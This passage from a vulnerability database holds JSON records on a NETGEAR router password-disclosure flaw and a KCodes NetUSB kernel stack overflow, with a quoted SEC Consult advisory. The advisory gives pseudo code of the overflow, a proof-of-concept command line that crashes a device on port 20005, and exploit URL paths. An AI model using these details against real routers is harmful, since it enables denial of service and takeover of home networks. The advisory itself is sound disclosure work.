"https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Web GUI Password Recovery and Exposure Security Vulnerability", "trust": 0.8, "url": "http://kb.netgear.com/30632/web-gui-password-recovery-and-exposure-security-vulnerability?cid=wmt_netgear_organic" }, { "title": "Patches for administrator password information disclosure vulnerabilities in various NETGEAR routers", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/88524" }, { "title": "Multiple NETGEAR Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67049" }, { "title": "kenzer-templates", "trust": 0.1, "url": "https://github.com/elsfa7-110/kenzer-templates " }, { "title": "kenzer-templates", "trust": 0.1, "url": "https://github.com/arpsyndicate/kenzer-templates " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/new-mirai-variant-carries-out-54-hour-ddos-attacks/124660/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2017/01/31/major_security_hole_in_netgear_routers/" }, { "title": "BleepingComputer", "trust": 0.1, "url": "https://www.bleepingcomputer.com/news/hardware/31-netgear-router-models-affected-by-flaw-that-exposes-admin-password/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113724" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "NVD", "id": "CVE-2017-5521" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "http://kb.netgear.com/30632/web-gui-password-recovery-and-exposure-security-vulnerability" }, { "trust": 2.0, "url": "http://www.securityfocus.com/bid/95457" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5521" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/41205/" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5521" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/95457/" }, { "trust": 0.3, "url": "http://www.netgear.com" }, { "trust": 0.2, "url": "https://\u0027" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/modules/auxiliary/gather/netgear_password_disclosure" }, { "trust": 0.1, "url": "http://router/passwordrecovered.cgi?id=trustwave_spiderlabs" }, { "trust": 0.1, "url": "https://www.trustwave.com" }, { "trust": 0.1, "url": "http://router/.../" }, { "trust": 0.1, "url": "https://www.trustwave.com/spiderlabs" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5521" }, { "trust": 0.1, "url": "http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/32883/" }, { "trust": 0.1, "url": "http://router/..../unauth.cgi?id=token" }, { "trust": 0.1, "url": "http://router/passwordrecovered.cgi?id=token" }, { "trust": 0.1, "url": "http://www.netgear.com/)" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "BID", "id": "95457" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "PACKETSTORM", "id": "140844" }, { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "BID", "id": "95457" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "PACKETSTORM", "id": "140844" }, { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-02-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-00835" }, { "date": "2017-01-17T00:00:00", "db": "VULHUB", "id": "VHN-113724" }, { "date": "2017-01-17T00:00:00", "db": "VULMON", "id": "CVE-2017-5521" }, { "date": "2017-01-16T00:00:00", "db": "BID", "id": "95457" }, { "date": "2017-02-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "date": "2017-01-31T17:02:22", "db": "PACKETSTORM", "id": "140844" }, { "date": "2017-01-17T09:59:00.333000", "db": "NVD", "id": "CVE-2017-5521" }, { "date": "2017-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-02-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-00835" }, { "date": "2017-09-01T00:00:00", "db": "VULHUB", "id": "VHN-113724" }, { "date": "2017-09-01T00:00:00", "db": "VULMON", "id": "CVE-2017-5521" }, { "date": "2017-01-23T03:09:00", "db": "BID", "id": "95457" }, { "date": "2017-02-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "date": "2017-09-01T01:29:35.680000", "db": "NVD", "id": "CVE-2017-5521" }, { "date": "2017-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201701-454" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural NETGEAR Device product password disclosure vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-001263" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201701-454" } ], "trust": 0.6 } }
var-201505-0408
Vulnerability from variot
Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel, as used in certain NETGEAR products, TP-LINK products, and other products, allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. KCodes NetUSB is vulnerable to a buffer overflow via the network that may result in a denial of service or code execution. KCodes NetUSB The kernel driver contains a buffer overflow vulnerability. KCodes NetUSB Is Linux Connected to base embedded devices (home router products, etc.) USB Share devices on the network "USB over IP" To realize the function, Linux Kernel module. Buffer overflow (CWE-120) - CVE-2015-3036 http://cwe.mitre.org/data/definitions/120.html The client NetUSB The data to send when connecting to the server NetUSB A buffer overflow can occur because the kernel driver does not validate properly. For more information SEC Consult Please check the advisory for. SEC Consult Vulnerability Lab Security Advisory < 20150519-0 > https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt In addition, National Vulnerability Database (NVD) Then CWE-119 It is published as CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer ( Buffer error ) http://cwe.mitre.org/data/definitions/119.htmlAn attacker on the local network caused a buffer overflow, resulting in a denial of service operation (DoS) An attacker may be able to attack or execute arbitrary code. Depending on the default settings of the device, a remote attack may be possible. KCodes NetUSB is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. SEC Consult Vulnerability Lab Security Advisory < 20150519-0 > ======================================================================= title: Kernel Stack Buffer Overflow product: KCodes NetUSB vulnerable version: see Vulnerable / tested versions fixed version: see Solution CVE number: CVE-2015-3036, VU#177092 impact: Critical homepage: http://www.kcodes.com/ found: 2015-02-23 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
"The world's premier technology provider of mobile printing, audio and video communication, file sharing, and USB applications for iPhones, iPads, smart phones and tablets (Android and Windows), MacBooks, and Ultrabooks."
Source: http://www.kcodes.com/
Vulnerability overview/description:
NetUSB suffers from a remotely exploitable kernel stack buffer overflow. Because of insufficient input validation, an overly long computer name can be used to overflow the "computer name" kernel stack buffer. This results in memory corruption which can be turned into arbitrary remote code execution.
Furthermore, a more detailed summary of this advisory has been published at our blog: http://blog.sec-consult.com
Proof of concept:
Below is an excerpt from the vulnerable run_init_sbus() function (pseudo code):
int computername_len; char computername_buf[64]; // connection initiation, handshake len = ks_recv(sock, &computername_len, 4, 0); // ... len = ks_recv(sock, computername_buf, computername_len, 0); // boom!
A proof of concept "netusb_bof.py" has been developed which exploits the vulnerability. The PoC DoS exploit will not be published as many vendors did not patch the vulnerability yet.
Example use that results in denial-of-service (kernel memory corruption that results in a device reboot): ./netusb_bof.py 192.168.1.1 20005 500
Vulnerable / tested versions:
The vulnerability has been verified to exist in most recent firmware versions of the following devives:
TP-Link TL-WDR4300 V1 TP-Link WR1043ND v2 NETGEAR WNDR4500
Furthermore we've identified NetUSB in the most recent firmware version of the following products (list is not necessarily complete!): D-Link DIR-615 C NETGEAR AC1450 NETGEAR CENTRIA (WNDR4700/4720) NETGEAR D6100 NETGEAR D6200 NETGEAR D6300 NETGEAR D6400 NETGEAR DC112A NETGEAR DC112A (Zain) NETGEAR DGND4000 NETGEAR EX6200 NETGEAR EX7000 NETGEAR JNR3000 NETGEAR JNR3210 NETGEAR JR6150 NETGEAR LG6100D NETGEAR PR2000 NETGEAR R6050 NETGEAR R6100 NETGEAR R6200 NETGEAR R6200v2 NETGEAR R6220 NETGEAR R6250 NETGEAR R6300v1 NETGEAR R6300v2 NETGEAR R6700 NETGEAR R7000 NETGEAR R7500 NETGEAR R7900 NETGEAR R8000 NETGEAR WN3500RP NETGEAR WNDR3700v5 NETGEAR WNDR4300 NETGEAR WNDR4300v2 NETGEAR WNDR4500 NETGEAR WNDR4500v2 NETGEAR WNDR4500v3 NETGEAR XAU2511 NETGEAR XAUB2511 TP-LINK Archer C2 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer C20 V1.0 (Not affected) TP-LINK Archer C20i V1.0 (Fix planned before 2015/05/25) TP-LINK Archer C5 V1.2 (Fix planned before 2015/05/22) TP-LINK Archer C5 V2.0 (Fix planned before 2015/05/30) TP-LINK Archer C7 V1.0 (Fix planned before 2015/05/30) TP-LINK Archer C7 V2.0 (Fix already released) TP-LINK Archer C8 V1.0 (Fix planned before 2015/05/30) TP-LINK Archer C9 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer D2 V1.0 (Fix planned before 2015/05/22) TP-LINK Archer D5 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer D7 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer D7B V1.0 (Fix planned before 2015/05/31) TP-LINK Archer D9 V1.0 (Fix planned before 2015/05/25) TP-LINK Archer VR200v V1.0 (Fix already released) TP-LINK TD-VG3511 V1.0 (End-Of-Life) TP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/31) TP-LINK TD-W1042ND V1.0 (End-Of-Life) TP-LINK TD-W1043ND V1.0 (End-Of-Life) TP-LINK TD-W8968 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8968 V2.0 (Fix planned before 2015/05/30) TP-LINK TD-W8968 V3.0 (Fix planned before 2015/05/25) TP-LINK TD-W8970 V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8970 V3.0 (Fix already released) TP-LINK TD-W8970B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W8980 V3.0 (Fix planned before 2015/05/25) TP-LINK TD-W8980B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-W9980 V1.0 (Fix already released) TP-LINK TD-W9980B V1.0 (Fix planned before 2015/05/30) TP-LINK TD-WDR4900 V1.0 (End-Of-Life) TP-LINK TL-WR1043ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR1043ND V3.0 (Fix planned before 2015/05/30) TP-LINK TL-WR1045ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR3500 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR3600 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR4300 V1.0 (Fix planned before 2015/05/22) TP-LINK TL-WR842ND V2.0 (Fix planned before 2015/05/30) TP-LINK TL-WR842ND V1.0 (End-Of-Life) TP-LINK TX-VG1530(GPON) V1.0 (Fix planned before 2015/05/31) Trendnet TE100-MFP1 (v1.0R) Trendnet TEW-632BRP (A1.0R) Trendnet TEW-632BRP (A1.1R/A1.2R) Trendnet TEW-632BRP (A1.1R/A1.2R/A1.3R) Trendnet TEW-634GRU (v1.0R) Trendnet TEW-652BRP (V1.0R) Trendnet TEW-673GRU (v1.0R) Trendnet TEW-811DRU (v1.0R) Trendnet TEW-812DRU (v1.0R) Trendnet TEW-812DRU (v2.xR) Trendnet TEW-813DRU (v1.0R) Trendnet TEW-818DRU (v1.0R) Trendnet TEW-823DRU (v1.0R) Trendnet TEW-MFP1 (v1.0R) Zyxel NBG-419N v2 Zyxel NBG4615 v2 Zyxel NBG5615 Zyxel NBG5715
Based on information embedded in KCodes drivers we believe the following vendors are affected: Allnet Ambir Technology AMIT Asante Atlantis Corega Digitus D-Link EDIMAX Encore Electronics Engenius Etop Hardlink Hawking IOGEAR LevelOne Longshine NETGEAR PCI PROLiNK Sitecom Taifa TP-LINK TRENDnet Western Digital ZyXEL
Vendor contact timeline:
2015-02-28: Contacting vendor through support@kcodes.com 2015-03-04: No response, contacting various KCodes addresses found on the web. 2015-03-05: Vendor responds, requests more information. 2015-03-05: Providing advisory and proof of concept exploit. 2015-03-16: No response, requesting status update. 2015-03-16: Vendor responds, asks about fix verification(?) 2015-03-16: Requesting clarification about fixing status and information about next steps. Proposing conference call dates. 2015-03-19: No response, informing that notification of CERT/CC and selected vendors will start shortly. Requesting clarification about fixing status and information about next steps again. 2015-03-19: Vendor responds, confirms conference call date (2015-03-25). No further information provided. 2015-03-19: Providing advisory and proof of concept exploit to TP-LINK and NETGEAR. 2015-03-25: Vendor cancels conference call on short notice (sudden week-long business trip). 2015-03-26: Asking for support of CERT/CC regarding vendor coordination. 2015-03 - 2015-05: Coordination between CERT & vendors, NETGEAR and TP-LINK 2015-05-13: Notifying German CERT-Bund and Austrian CERT.at 2015-05-19: Coordinated release of security advisory
Solution:
TP-LINK has started releasing fixed firmware. The status of affected products can be found in the affected product list above.
For additional information also see CERT/CC vulnerability notice: http://www.kb.cert.org/vuls/id/177092
Workaround:
Sometimes NetUSB can be disabled via the web interface, but at least on NETGEAR devices this does not mitigate the vulnerability. NETGEAR told us, that there is no workaround available, the TCP port can't be firewalled nor is there a way to disable the service on their devices. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF Stefan Viehböck / @2015
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201505-0408", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "netusb", "scope": "eq", "trust": 1.6, "vendor": "kcodes", "version": null }, { "model": "tew-632brp", "scope": null, "trust": 1.2, "vendor": "trendnet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "d link", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "kcodes", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "netgear", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "tp link", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "trendnet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "zyxel", "version": null }, { "model": "", "scope": null, "trust": 0.8, "vendor": "multiple vendors", "version": null }, { "model": "tew-812dru", "scope": null, "trust": 0.6, "vendor": "trendnet", "version": null }, { "model": "nbg5715", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "0" }, { "model": "nbg5615", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "0" }, { "model": "nbg4615", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "v2" }, { "model": "nbg-419n", "scope": "eq", "trust": 0.3, "vendor": "zyxel", "version": "v20" }, { "model": "tew-mfp1", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-823dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-818dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-813dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-811dru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-673gru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-652brp", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tew-634gru", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "te100-mfp1", "scope": null, "trust": 0.3, "vendor": "trendnet", "version": null }, { "model": "tx-vg1530", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "tl-wr842nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "model": "tl-wr842nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "tl-wr4300", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "tl-wr3600", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "tl-wr3500", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "tl-wr1045nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "model": "tl-wr1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "model": "tl-wr1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "model": "td-wdr4900", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w9980b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w9980", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w8980b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w8980", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "model": "td-w8970b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w8970", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "model": "td-w8970", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "3.0" }, { "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "model": "td-w8968", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w1043nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-w1042nd", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-vg3631", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "td-vg3511", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer vr200v", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer d9", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer d7b", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer d7", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer d5", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer d2", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer c7", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer c5", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "2.0" }, { "model": "archer c20i", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "archer c2", "scope": "eq", "trust": 0.3, "vendor": "tp link", "version": "1.0" }, { "model": "xaub2511", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "xau2511", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr4500v3", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr4500v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr4500", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr4300v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr4300", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wndr3700v5", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "wn3500rp", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r8000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r7900", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r7500", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r7000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6700", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6300v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6300v1", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6250", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6220", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6200v2", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6200", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6100", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "r6050", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "pr2000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "lg6100d", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "jr6150", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "jnr3000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "ex7000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "ex6200", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "dgnd4000", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "dc112a", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "d6400", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "d6300", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "d6200", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "d6100", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "centria wndr4720", "scope": null, "trust": 0.3, "vendor": "netgear", "version": null }, { "model": "centria wndr4700", "scope": null, "trust": 0.3, "vendor": "netgear", "version": null }, { "model": "ac1450", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "model": "netusb", "scope": "eq", "trust": 0.3, "vendor": "kcodes", "version": "0" }, { "model": "dir-685", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.00" }, { "model": "dir-615", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "3.13" } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:kcodes:netusb:-:*:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-3036" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stefan Viehb\u00f6ck from SEC Consult Vulnerability Lab", "sources": [ { "db": "BID", "id": "74724" } ], "trust": 0.3 }, "cve": "CVE-2015-3036", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, 